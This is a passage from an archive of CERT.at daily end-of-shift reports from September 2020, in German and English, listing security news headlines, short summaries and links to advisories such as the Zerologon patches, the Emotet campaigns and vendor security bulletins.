∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to Kibana vulnerabilities (CVE-2020-7015, CVE-2020-7013, CVE-2020-7012) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln… ∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to a Kubernetes vulnerability (CVEID: 182747) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln… ∗∗∗ Security Bulletin: Security Vulnerabilities affect IBM Cloud Private – Node.js (CVE-2019-15605, CVE-2019-15606) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 25.09.2020
by Daily end-of-shift report 25 Sep '20

25 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 24-09-2020 18:00 − Freitag 25-09-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Datenleck: Airbnb gibt Gastgebern Zugriff auf fremde Postfächer ∗∗∗ --------------------------------------------- Hosts berichten, dass ihnen die Nachrichten anderer Airbnb-Hosts angezeigt werden - bis hin zur PIN, mit der sich die Tür öffnen lässt. --------------------------------------------- https://www.golem.de/news/datenleck-airbnb-gibt-gastgebern-zugriff-auf-frem… ∗∗∗ Sodinokibi Ransomware 101: Origin, Victims, Prevention Strategies ∗∗∗ --------------------------------------------- Cyberattacks have become a part of our reality, but have you ever wondered what might happen if your company gets targeted? You probably imagine that you would lose some money and a great deal of time, maybe fire an employee or too, lose a few clients and have your reputation tainted or eventually even deal [...] --------------------------------------------- https://heimdalsecurity.com/blog/sodinokibi-ransomware-101/ ∗∗∗ Ghost in action: the Specter botnet ∗∗∗ --------------------------------------------- On August 20, 2020, 360Netlab Threat Detect System captured a suspicious ELF file (22523419f0404d628d02876e69458fbe.css) with 0 VT detection. When we took a close look, we see a new botnet that targets AVTECH IP Camera / NVR / DVR devices, and it has flexible configuration, highly modular / plugin, and uses TLS, [...] --------------------------------------------- https://blog.netlab.360.com/ghost-in-action-the-specter-botnet/ ∗∗∗ Securing Exchange Online [Guest Diary], (Fri, Sep 25th) ∗∗∗ --------------------------------------------- [...] The base configuration of Exchange Online is set to allow quick onboarding of customers with minimal barriers to the smooth migration of email into the service. The configuration does require tweaks to in order to make it more secure. I aim to cover some of the more effective tweaks in this document and point the reader to the right documentation to secure their Exchange tenant. --------------------------------------------- https://isc.sans.edu/diary/rss/26600 ∗∗∗ Fortinet VPN with Default Settings Leave 200,000 Businesses Open to Hackers ∗∗∗ --------------------------------------------- As the pandemic continues to accelerate the shift towards working from home, a slew of digital threats have capitalized on the health concern to exploit weaknesses in the remote work infrastructure and carry out malicious attacks. Now according to network security platform provider SAM Seamless Network, over 200,000 businesses that have deployed the Fortigate VPN solution to enable employees to [...] --------------------------------------------- https://thehackernews.com/2020/09/fortigate-vpn-security.html ∗∗∗ Studie: Angreifer wollen ins Homeoffice – millionenfach über RDP-Verbindungen ∗∗∗ --------------------------------------------- In Corona-Zeiten haben Forscher einen signifikanten Anstieg von Attacken auf Remote-Verbindungen registriert. Mit den richtigen Tipps schützt man sich. --------------------------------------------- https://heise.de/-4912452 ∗∗∗ Security-Updatepaket für Ciscos Netzwerkbetriebssysteme IOS und IOS XE ∗∗∗ --------------------------------------------- Admins aufgepasst: Vor dem Start ins Wochenende warten noch Updates für IOS und IOS XE, die insgesamt 34 Schwachstellen mit hoher Risikoeinstufung schließen. --------------------------------------------- https://heise.de/-4912352 ∗∗∗ Handling Incidents in ICS – Getting to the Root of the Problem ∗∗∗ --------------------------------------------- For most organizations, having an incident response plan is a regulatory or even legal requirement these days. Unfortunately just having [...] --------------------------------------------- https://www.dragos.com/blog/industry-news/handling-incidents-in-ics-getting… ===================== = Vulnerabilities = ===================== ∗∗∗ macOS Catalina 10.15.7, Security Update 2020-005 High Sierra, Security Update 2020-005 Mojave ∗∗∗ --------------------------------------------- This document describes the security content of macOS Catalina 10.15.7, Security Update 2020-005 High Sierra, Security Update 2020-005 Mojave. --------------------------------------------- https://support.apple.com/kb/HT211849 ∗∗∗ iCloud for Windows 11.4 ∗∗∗ --------------------------------------------- This document describes the security content of iCloud for Windows 11.4. --------------------------------------------- https://support.apple.com/kb/HT211846 ∗∗∗ iCloud for Windows 7.21 ∗∗∗ --------------------------------------------- This document describes the security content of iCloud for Windows 7.21. --------------------------------------------- https://support.apple.com/kb/HT211847 ∗∗∗ Cisco Security Advisories ∗∗∗ --------------------------------------------- Cisco hat 42 Security Advisories mit folgenden "Security Impact Ratings" veröffentlicht: High: 29 Medium: 13 --------------------------------------------- https://tools.cisco.com/security/center/Search.x?publicationTypeIDs=1&first… ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (rails), openSUSE (chromium, jasper, ovmf, roundcubemail, samba, and singularity), Oracle (firefox), SUSE (bcm43xx-firmware, firefox, libqt5-qtbase, qemu, and tiff), and Ubuntu (aptdaemon, atftp, awl, packagekit, and spip). --------------------------------------------- https://lwn.net/Articles/832509/ ∗∗∗ Security Bulletin: IBM InfoSphere Information Server is vulnerable to Cross-frame scripting ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-infosphere-informatio… ∗∗∗ Security Bulletin: Security Vulnerabilities in IBM® Java SDK July 2020 CPU plus CVE-2020-2590 and CVE-2020-2601 affect multiple IBM Continuous Engineering products based on IBM Jazz Technology ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-… ∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affect IBM Spectrum Conductor and IBM Spectrum Conductor with Spark ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… ∗∗∗ Security Bulletin: WebSphere Application Server is vulnerable to an information exposure vulnerability (CVE-2020-4643) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser… ∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affect IBM Spectrum Conductor and IBM Spectrum Conductor with Spark ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… ∗∗∗ Security Bulletin: Information disclosure vulnerability affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4531 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-vu… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 24.09.2020
by Daily end-of-shift report 24 Sep '20

24 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 23-09-2020 18:00 − Donnerstag 24-09-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Security-Checkliste Passwörter & Accounts ∗∗∗ --------------------------------------------- Passwörter sind ein notwendiges Übel. Mit den folgenden Tipps haben Sie so wenig Passwortstress wie nötig, ohne an der Sicherheit zu sparen. --------------------------------------------- https://heise.de/-4886755 ∗∗∗ Vorsicht vor Raiffeisen Phishing SMS ∗∗∗ --------------------------------------------- Momentan werden massenhaft betrügerische Phishing SMS im Namen der Raiffeisen Bank verschickt. Angeblich sollte eine PushTAN Registrierung abgeschlossen werden. Die verlinkte Website sieht der echten dabei zum Verwechseln ähnlich. Achtung: Hier dürfen keinesfalls die eigenen Online Banking Daten eingegeben werden. Diese landen direkt in den Händen Krimineller. --------------------------------------------- https://www.watchlist-internet.at/news/vorsicht-vor-raiffeisen-phishing-sms/ ∗∗∗ Android-Malware Alien stiehlt Geld ∗∗∗ --------------------------------------------- Ein Android-Trojaner namens Alien ist seit Anfang des Jahres aktiv und wird als Malware-as-a-Service (MaaS) in unterirdischen Hackerforen angeboten. Ziel sind Banking- und Finanz-Apps auch in Deutschland --------------------------------------------- https://www.zdnet.de/88382932/android-malware-alien-stiehlt-geld/ ∗∗∗ Supply Chain bietet Angriffspunkte ∗∗∗ --------------------------------------------- Hacker nutzen zunehmend die Lieferketten im Ökosystem von Unternehmen, um ihre Angriffe vorzutragen. Kleinere Lieferanten mit schwachen Sicherheitsstrukturen bieten Einstiegspunkte für Attacken. --------------------------------------------- https://www.zdnet.de/88382938/supply-chain-bietet-angriffspunkte/ ∗∗∗ Protecting Against PowerShell Attacks: 5 Key Steps ∗∗∗ --------------------------------------------- Admins are already busy maintaining all systems running onsite and remotely, so the extra demand to protect against fileless threats can be overwhelming for manual security operations and inexperienced IT professionals. There are, however, five basic steps you can take to help mitigate the threat --------------------------------------------- https://www.beyondtrust.com/blog/entry/protecting-against-powershell-attack… ∗∗∗ AgeLocker ransomware targets QNAP NAS devices, steals data ∗∗∗ --------------------------------------------- QNAP NAS devices are being targeted in attacks by the AgeLocker ransomware, which encrypts the devices data, and in some cases, steal files from the victim. --------------------------------------------- https://www.bleepingcomputer.com/news/security/agelocker-ransomware-targets… ∗∗∗ Malicious One-Liner Using Hastebin ∗∗∗ --------------------------------------------- Short scripts that deliver malware to a website are nothing new, but during a recent investigation we found a script using hastebin[.]com, which is a domain we see used infrequently. The script was found writing malicious contents into an image directory on a compromised website, allowing an attacker to execute other malicious commands. --------------------------------------------- https://blog.sucuri.net/2020/09/malicious-one-liner-using-hastebin.html ∗∗∗ [SANS ISC] Party in Ibiza with PowerShell ∗∗∗ --------------------------------------------- I published the following diary on isc.sans.edu: "Party in Ibiza with PowerShell": Today, I would like to talk about PowerShell ISE or "Integration Scripting Environment". This tool is installed by default on all Windows computers (besides the classic PowerShell interpreter). From a malware analysis point of view, ISE offers a key feature: [...] --------------------------------------------- https://blog.rootshell.be/2020/09/24/sans-isc-party-in-ibiza-with-powershel… ∗∗∗ Fuzzing Image Parsing in Windows, Part One: Color Profiles ∗∗∗ --------------------------------------------- Image parsing and rendering are basic features of any modern operating system (OS). Image parsing is an easily accessible attack surface, and a vulnerability that may lead to remote code execution or information disclosure in such a feature is valuable to attackers. --------------------------------------------- https://www.fireeye.com/blog/threat-research/2020/09/fuzzing-image-parsing-… ===================== = Vulnerabilities = ===================== ∗∗∗ Jetzt patchen! Attacken auf Zerologon-Lücke in Windows Server ∗∗∗ --------------------------------------------- Microsoft warnt vor Attacken auf eine kritische Sicherheitslücke in verschiedenen Windows-Server-Versionen. Auch Samba ist betroffen. --------------------------------------------- https://heise.de/-4910854 ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Fedora (firefox, libproxy, mbedtls, samba, and zeromq), openSUSE (chromium and virtualbox), Red Hat (firefox and kernel), SUSE (cifs-utils, conmon, fuse-overlayfs, libcontainers-common, podman, libcdio, python-pip, samba, and wavpack), and Ubuntu (rdflib). --------------------------------------------- https://lwn.net/Articles/832405/ ∗∗∗ Synology-SA-20:22 SRM ∗∗∗ --------------------------------------------- A vulnerability allows remote authenticated users to bypass security constraints via a susceptible version of Synology Router Manager (SRM). --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_20_22 ∗∗∗ Wireshark: Mehrere Schwachstellen ermöglichen Denial of Service ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0922 ∗∗∗ Security Bulletin: Multiple vulnerabilities in Apache Struts affect Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Spectrum Conductor and IBM Spectrum Conductor with Spark ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Multiple Vulnerabilities Have Been Identified In IBM Security Verify Privilege Manager previously known as IBM Security Privilege Manager ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Publicly disclosed vulnerabilities from Kernel affect IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Security Bulletin: Publicly disclosed vulnerabilities from Kernel affect IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Security Bulletin: Multiple Vulnerabilities Have Been Identified In IBM Security Verify Privilege Vault previously known as IBM Security Secret Server ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Security Bulletin: Multiple vulnerabilities affect IBM Tivoli Monitoring embedded WebSphere Application and IHS server ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 23.09.2020
by Daily end-of-shift report 23 Sep '20

23 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 22-09-2020 18:00 − Mittwoch 23-09-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Security-Checkliste Webbrowser ∗∗∗ --------------------------------------------- Ihr Browser kommt, auch ohne Surfen auf zwielichtigen Websites, sehr häufig mit Schadcode in Kontakt. Umso wichtiger ist es, ihn maximal sicher einzustellen. --------------------------------------------- https://heise.de/-4886750 ∗∗∗ Aufgepasst: Emotet versteckt sich nun in passwortgeschützten Archiven ∗∗∗ --------------------------------------------- Die Drahtzieher hinter Emotet haben eine neue Kampagne gestartet, um die Malware zu verbreiten. Dieses Mal haben Sie aber bei einer Sache gepennt. --------------------------------------------- https://heise.de/-4909712 ∗∗∗ Betrügerische Kredite von Continental Bank und Eran Finance! ∗∗∗ --------------------------------------------- Durch die Auswirkungen der Corona-Krise sind immer mehr Menschen von Finanzhilfen abhängig. Kein Wunder, dass Kredite und Darlehen beliebter werden und dass auch Cyberkriminelle betrügerischen Kredite anbieten. So zum Beispiel der Kreditvermittler royal-eranfinance.com und die Bank continental-groupe.com. Die beiden vermeintlichen Unternehmen arbeiten zusammen. Doch statt Kredite auszuzahlen, stehlen die Unternehmen die Identität der Opfer und verlangen Vorschusszahlungen. --------------------------------------------- https://www.watchlist-internet.at/news/betruegerische-kredite-von-continent… ∗∗∗ Case Study: Emotet Thread Hijacking, an Email Attack Technique ∗∗∗ --------------------------------------------- Thread hijacking, recently used to distribute Emotet, uses stolen copies of messages collected from infected users' email clients to attack others. --------------------------------------------- https://unit42.paloaltonetworks.com/emotet-thread-hijacking/ ∗∗∗ Linux vulnerabilities: How unpatched servers lead to persistent backdoors ∗∗∗ --------------------------------------------- Vulnerability management is a challenge Humans make mistakes, software has bugs and some of these bugs are exploitable vulnerabilities. The existence of vulnerabilities in software is not a new problem, but as the volume of software in existence grows, so does the number of exploitable vulnerabilities. --------------------------------------------- https://resources.infosecinstitute.com/linux-vulnerabilities-how-unpatched-… ∗∗∗ Looking for sophisticated malware in IoT devices ∗∗∗ --------------------------------------------- Let's talk about the structure of the firmware of an IoT device in order to get a better understanding of the different components. --------------------------------------------- https://securelist.com/looking-for-sophisticated-malware-in-iot-devices/985… ∗∗∗ [SANS ISC] Malicious Word Document with Dynamic Content ∗∗∗ --------------------------------------------- I published the following diary on isc.sans.edu: "Malicious Word Document with Dynamic Content": Here is another malicious Word document that I spotted while hunting. "Another one?" may ask some of our readers. Indeed but malicious documents remain a very common infection vector and you learn a lot when you analyze [...] --------------------------------------------- https://blog.rootshell.be/2020/09/23/sans-isc-malicious-word-document-with-… ===================== = Vulnerabilities = ===================== ∗∗∗ Critical Vulnerabilities Patched in XCloner Backup and Restore Plugin ∗∗∗ --------------------------------------------- On August 14, our Threat Intelligence team discovered several vulnerabilities present in XCloner Backup and Restore, a WordPress plugin installed on over 30,000 sites. This flaw gave authenticated attackers, with subscriber-level or above capabilities, the ability to modify arbitrary files, including PHP files. Doing so would allow an attacker to achieve remote code execution on [...] --------------------------------------------- https://www.wordfence.com/blog/2020/09/critical-vulnerabilities-patched-in-… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by openSUSE (libetpan, libqt4, lilypond, otrs, and perl-DBI), Red Hat (kernel-rt), Slackware (seamonkey), SUSE (grafana, libmspack, openldap2, ovmf, pdns, rubygem-actionpack-5_1, and samba), and Ubuntu (debian-lan-config, ldm, libdbi-perl, and netty-3.9). --------------------------------------------- https://lwn.net/Articles/832276/ ∗∗∗ Samba Issues Patches for Zerologon Vulnerability ∗∗∗ --------------------------------------------- The Samba team has released patches for a critical-severity elevation of privilege vulnerability impacting the Microsoft Windows Netlogon Remote Protocol (MS-NRPC). --------------------------------------------- https://www.securityweek.com/samba-issues-patches-zerologon-vulnerability ∗∗∗ CVE-2020-1472/Zerologon. As an IT manager should I worry? ∗∗∗ --------------------------------------------- TL;DR Yes, apply the update from Microsoft. --------------------------------------------- https://www.pentestpartners.com/security-blog/cve-2020-1472-zerologon-as-an… ∗∗∗ Citrix Hypervisor Security Update ∗∗∗ --------------------------------------------- Several security issues have been identified in Citrix Hypervisor (formerly Citrix XenServer) that may allow privileged code in a guest VM to cause the host to crash or become unresponsive. In addition, unprivileged code in a PV guest VM may be able to [...] --------------------------------------------- https://support.citrix.com/article/CTX282314 ∗∗∗ Security Advisory - Buffer Overflow Vulnerability BootHole in GRUB2 Secure Boot ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200923-… ∗∗∗ Security Advisory - Insufficient Input Validation Vulnerability in Some Huawei Phones ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200923-… ∗∗∗ Security Bulletin: Cross-site scripting vulnerability affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4698 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln… ∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to path traversal (CVE-2019-4582) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme… ∗∗∗ Security Bulletin: A vulneraqbility in SQLite affects IBM Cloud Application Performance Managment R esponse Time Monitoring Agent (CVE-2020-15358) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulneraqbility-in-sqlit… ∗∗∗ Atlassian Confluence: Schwachstelle ermöglicht Offenlegung von Informationen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0920 ∗∗∗ Red Hat Enterprise Linux: Schwachstelle ermöglicht Denial of Service ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0921 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 22.09.2020
by Daily end-of-shift report 22 Sep '20

22 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Montag 21-09-2020 18:00 − Dienstag 22-09-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Google Cloud Buckets Exposed in Rampant Misconfiguration ∗∗∗ --------------------------------------------- A too-large percentage of cloud databases containing highly sensitive information are publicly available, an analysis shows. --------------------------------------------- https://threatpost.com/google-cloud-buckets-exposed-misconfiguration/159429/ ∗∗∗ New and improved Security Update Guide! ∗∗∗ --------------------------------------------- We're excited to announce a significant update to the Security Update Guide, our one-stop site for information about all security updates provided by Microsoft. This new version will provide a more intuitive user experience to help protect our customers regardless of what Microsoft products or services they use in their environment. --------------------------------------------- https://msrc-blog.microsoft.com:443/2020/09/21/new-and-improved-security-up… ∗∗∗ Cyberbedrohungen: Kostenlose "Adversary Emulation Plans" für Firmen verfügbar ∗∗∗ --------------------------------------------- Ein neues MITRE-Projekt stellt Informationen bereit, die Red Teams Schritt für Schritt beim Nachstellen realitätsnaher Angriffsszenarien unterstützen sollen. --------------------------------------------- https://heise.de/-4907083 ∗∗∗ instructionsweb.com führt in Abo-Falle ∗∗∗ --------------------------------------------- Die Suche nach einer Gebrauchsanleitung für ein elektronisches Gerät führte Sie zu instructionsweb.com? Sie haben dort schnell und unkompliziert die benötigte Anleitung gefunden? Auch der Preis von 95 Cent ist erschwinglich. Vorsicht: Mit Eingabe Ihrer Kreditkartendaten tappen Sie in eine Abo-Falle, die Sie monatlich € 11,95 kostet! Und: Anleitung gibt's trotz Bezahlung keine! --------------------------------------------- https://www.watchlist-internet.at/news/instructionswebcom-fuehrt-in-abo-fal… ∗∗∗ Does your business have a Well-Known URL for changing passwords? It should! ∗∗∗ --------------------------------------------- If you're a business which has a website that customers access via a password, spend a few minutes create your own .well-known/change-password which points users to the correct place. --------------------------------------------- https://businessinsights.bitdefender.com/business-url-changing-password ∗∗∗ Optimizing Away JavaScript Obfuscation. (arXiv:2009.09170v1 [cs.CR]) ∗∗∗ --------------------------------------------- JavaScript is a popular attack vector for releasing malicious payloads on unsuspecting Internet users. Authors of this malicious JavaScript often employ numerous obfuscation techniques in order to prevent the automatic detection by antivirus and hinder manual analysis by professional malware analysts. Consequently, this paper presents SAFE-Deobs, a JavaScript deobfuscation tool that we have built. --------------------------------------------- https://arxiv.org/abs/2009.09170 ∗∗∗ Microsoft sichert ungeschützten Backend-Server seiner Suchmaschine Bing ∗∗∗ --------------------------------------------- Er gibt 6,5 TByte Daten preis. Es handelt sich ausschließlich um Log-Dateien ohne persönliche Informationen. Microsoft spricht von einer Fehlkonfiguration – dem fraglichen Server fehlte ein Passwort. --------------------------------------------- https://www.zdnet.de/88382854/microsoft-sichert-ungeschuetzten-backend-serv… ===================== = Vulnerabilities = ===================== ∗∗∗ Firefox: Neue Desktop-Versionen beseitigen mögliche Einfallstore für Angreifer ∗∗∗ --------------------------------------------- Mit den Versionen 81 und ESR 78.3 des Webbrowsers Firefox liefert das Mozilla-Team auch diverse Lücken-Fixes aus. --------------------------------------------- https://heise.de/-4909119 ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Mageia (mysql-connector-java), openSUSE (chromium, curl, libqt4, and singularity), Red Hat (bash and kernel), SUSE (python-pip and python3), and Ubuntu (busybox, ceph, freeimage, libofx, libpam-tacplus, linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp, linux-gcp-4.15, linux-gke-4.15, linux-hwe, linux-oem, linux-oracle, linux-raspi2, linux-snapdragon, linux, linux-azure, linux-gcp, linux-oracle, novnc, and tnef). --------------------------------------------- https://lwn.net/Articles/832164/ ∗∗∗ VMware Horizon DaaS: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen ∗∗∗ --------------------------------------------- Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in VMware Horizon DaaS ausnutzen, um Sicherheitsvorkehrungen zu umgehen. --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0916 ∗∗∗ Xen Security Advisories ∗∗∗ --------------------------------------------- The Xen Project has released 10 Security Advisories on 2020-09-22. --------------------------------------------- https://xenbits.xen.org/xsa/ ∗∗∗ Security Bulletin: CVE-2020-2590 (deferred from Oracle Jan 2020 CPU) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2590-deferred-fr… ∗∗∗ Security Bulletin: CVE-2020-2601 (deferred from Oracle Jan 2020 CPU) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2601-deferred-fr… ∗∗∗ Security Bulletin: IBM Data Risk Manager is affected by multiple vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-data-risk-manager-is-… ∗∗∗ Security Bulletin: IBM SDK, Java Technology Edition Quarterly CPU – Jul 2020 – Includes Oracle Jul 2020 CPU plus one additional vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-sdk-java-technology-e… ∗∗∗ Security Bulletin: CVE-2020-2601 (deferred from Oracle Jan 2020 CPU) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2601-deferred-fr… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Cloud Manager with OpenStack ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Apache ZooKeeper as used by IBM QRadar SIEM is vulnerable to information disclosure (CVE-2019-0201) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-apache-zookeeper-as-used-… ∗∗∗ Security Bulletin: CVE-2020-2590 (deferred from Oracle Jan 2020 CPU) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2590-deferred-fr… ∗∗∗ Security Bulletin: Vulnerabilities in Node.js affect IBM App Connect Enterprise V11 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-node-j… ∗∗∗ Security Bulletin: IBM SDK, Java Technology Edition Quarterly CPU – Jul 2020 – Includes Oracle Jul 2020 CPU plus one additional vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-sdk-java-technology-e… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 21.09.2020
by Daily end-of-shift report 21 Sep '20

21 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 18-09-2020 18:00 − Montag 21-09-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Google App Engine: Redirect-Feature begünstigt Phishing und Malware-Verbreitung ∗∗∗ --------------------------------------------- Googles Cloud-Anwendungsplattform App Engine bietet Kriminellen beim Generieren schädlicher Links viel Freiraum, den diese im Zuge aktiver Angriffe auskosten. --------------------------------------------- https://heise.de/-4906593 ∗∗∗ iOS 14: Private WLAN-Adressen können für Probleme sorgen ∗∗∗ --------------------------------------------- iOS 14 sattelt iPhones automatisch auf zufällige MAC-Adressen um. Das führt in Heim- und Firmennetzen unter Umständen zu Verbindungsstörungen. --------------------------------------------- https://heise.de/-4907542 ∗∗∗ uMatrix wird nicht weiterentwickelt: Repository steht auf "archived" ∗∗∗ --------------------------------------------- Die Browser-Erweiterung uMatrix ist auf GitHub als archiviert markiert worden. Damit endet die Weiterentwicklung der Firewall. --------------------------------------------- https://heise.de/-4906711 ∗∗∗ Windows 10 Health Report: September 2020 issues, Defender fiasco, & more ∗∗∗ --------------------------------------------- This Windows 10 Health Report provides an overview of the problems people are encountering in September 2020 due to new cumulative updates or changes made in the operating system. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/windows-10-health-report-se… ∗∗∗ Slightly broken overlay phishing, (Mon, Sep 21st) ∗∗∗ --------------------------------------------- At the Internet Storm Center, we often receive examples of interesting phishing e-mails from our readers. Of course, this is not the only source of interesting malicious messages in our inboxes - sometimes the phishing authors "cut out the middleman" and send their creations directly to us. Last week, this was the case with a slightly unusual (and slightly broken) phishing, which tries to use legitimate pages overlaid with a fake login prompt. --------------------------------------------- https://isc.sans.edu/diary/rss/26586 ∗∗∗ The Hidden PHP Malware that Reinfects Cleaned Files ∗∗∗ --------------------------------------------- Website reinfections are a serious problem for website owners, and it can often be difficult to determine the cause behind the reinfection — especially if you lack access to necessary logs, which is usually the case for shared hosting services. Some of the more common causes of reinfections are issues like cross- site contamination or unpatched website software security vulnerabilities that get re-exploited. --------------------------------------------- https://blog.sucuri.net/2020/09/the-hidden-php-malware-that-reinfects-clean… ∗∗∗ One Part Steganography, Four Redirectors, and a Splash of C2! ∗∗∗ --------------------------------------------- What do you get when you combine Google Images, QR Codes, and Remote Command Execution? This silly project of mine Id like to share with you all, of course! Building off of my security research from my last couple of blogs, I decided to use my research using dynamic web content to proxy traffic over third party image providers, and try to find a valid bi-directional method for sending data between a NATd client and a public server. --------------------------------------------- https://medium.com/@curtbraz/one-part-steganography-four-redirectors-and-a-… ∗∗∗ Is domain name abuse something companies should worry about? ∗∗∗ --------------------------------------------- Should you worry about domain name abuse? For the most part it depends on what kind of company you are and what you expect to encounter. --------------------------------------------- https://blog.malwarebytes.com/business-2/2020/09/is-domain-name-abuse-somet… ∗∗∗ The Return of Raining SYSTEM Shells with Citrix Workspace app ∗∗∗ --------------------------------------------- TL;DR Back in July I documented a new Citrix Workspace vulnerability that allowed attackers to remotely execute arbitrary commands under the SYSTEM account. Well after some further investigation on the [...] --------------------------------------------- https://www.pentestpartners.com/security-blog/the-return-of-raining-system-… ∗∗∗ Code execution, defense evasion are top tactics used in critical attacks against corporate endpoints ∗∗∗ --------------------------------------------- Cisco examines MITRE ATT&CK data to suggest the threat vectors enterprise security staff should focus their 